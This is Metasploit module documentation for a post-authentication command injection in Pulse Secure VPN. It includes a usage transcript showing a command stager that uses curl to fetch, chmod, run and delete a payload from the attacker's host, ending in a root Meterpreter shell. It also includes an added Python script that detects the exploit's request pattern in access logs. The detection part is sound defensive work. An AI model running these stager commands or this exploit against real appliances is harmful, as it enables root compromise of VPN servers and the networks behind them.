metasploit-gs/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md
## Introduction
This module exploits a post-auth command injection in the Pulse Secure
VPN server to execute commands as root. The `env(1)` command is used to
bypass application whitelisting and run arbitrary commands.
Please see the related module `auxiliary/gather/pulse_secure_file_disclosure`
for a pre-auth file read that can obtain plaintext and hashed
credentials, plus session IDs that may be used with this exploit.

A valid administrator session ID is required; it is used instead of an
SSRF path that has not been tested.
## Targets
```
Id Name
-- ----
0 Unix In-Memory
1 Linux Dropper
```
## Options
**SID**
Set this to a valid administrator session ID. Typically retrieved using
the `auxiliary/gather/pulse_secure_file_disclosure` module.
## Usage
```
msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
sid => 676f5f892e8c4a6419f10564f9e9d857
msf5 exploit(linux/http/pulse_secure_cmd_exec) > run
[*] Started reverse TCP handler on 127.0.0.1:[redacted]
[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
[*] Obtaining CSRF token
[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
[*] Executing Linux Dropper target
[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
[*] Local IP: https://[redacted]:[redacted]/HSEjp77
[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
[+] Payload execution successful
[*] Command Stager progress - 63.96% done (71/111 bytes)
[*] Executing command: env chmod +x /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 87.39% done (97/111 bytes)
[*] Executing command: env /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
[!] Payload execution may have failed
[*] Command Stager progress - 102.70% done (114/111 bytes)
[*] Executing command: env rm -f /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 123.42% done (137/111 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : [redacted]
OS : (Linux 2.6.32-00486-gddd7e32-dirty)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
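The transcript above shows the module's observable footprint on the appliance's web tier: each stager step is one request to `/dana-admin/diag/diag.cgi` immediately followed by one to `/dana-na/auth/setcookie.cgi`, repeated for every command. The following detection script is an added example, not part of the module or the Metasploit project; it assumes a Common Log Format access log (the appliance's real log layout is not shown here) and flags clients that produce that diag.cgi/setcookie.cgi pairing repeatedly within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log sample in Common Log Format (an assumption: the real
# appliance log layout is not shown in the module doc). Two exploit-style
# diag.cgi -> setcookie.cgi pairs from one client, plus benign admin traffic.
SAMPLE_LOG = """\
198.51.100.7 - admin [12/Nov/2019:02:05:31 -0600] "POST /dana-admin/diag/diag.cgi HTTP/1.1" 200 512
198.51.100.7 - admin [12/Nov/2019:02:05:31 -0600] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 0
198.51.100.7 - admin [12/Nov/2019:02:05:34 -0600] "POST /dana-admin/diag/diag.cgi HTTP/1.1" 200 512
198.51.100.7 - admin [12/Nov/2019:02:05:34 -0600] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 0
203.0.113.9 - admin [12/Nov/2019:02:10:00 -0600] "GET /dana-admin/diag/diag.cgi HTTP/1.1" 200 2048
203.0.113.9 - admin [12/Nov/2019:02:31:12 -0600] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 0
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<path>\S+) ')
DIAG_PATH = "/dana-admin/diag/diag.cgi"        # where the module sends the injection
TRIGGER_PATH = "/dana-na/auth/setcookie.cgi"   # where it triggers the payload


def parse(log_text):
    """Yield (ip, timestamp, path) for each well-formed line; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["path"]


def find_suspects(log_text, window=timedelta(seconds=10), min_pairs=2):
    """Return {ip: count} for clients with at least `min_pairs` diag.cgi
    requests each followed by a setcookie.cgi hit within `window`."""
    by_ip = defaultdict(list)
    for ip, ts, path in parse(log_text):
        by_ip[ip].append((ts, path))
    suspects = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])      # stable: keeps log order on ties
        pairs = 0
        for i, (ts, path) in enumerate(events):
            if path == DIAG_PATH and any(
                p == TRIGGER_PATH and t - ts <= window for t, p in events[i + 1:]
            ):
                pairs += 1
        if pairs >= min_pairs:
            suspects[ip] = pairs
    return suspects
```

Legitimate admin use of the diagnostics page rarely alternates with setcookie.cgi several times in seconds, so tune `window` and `min_pairs` against your own baseline before alerting on the result.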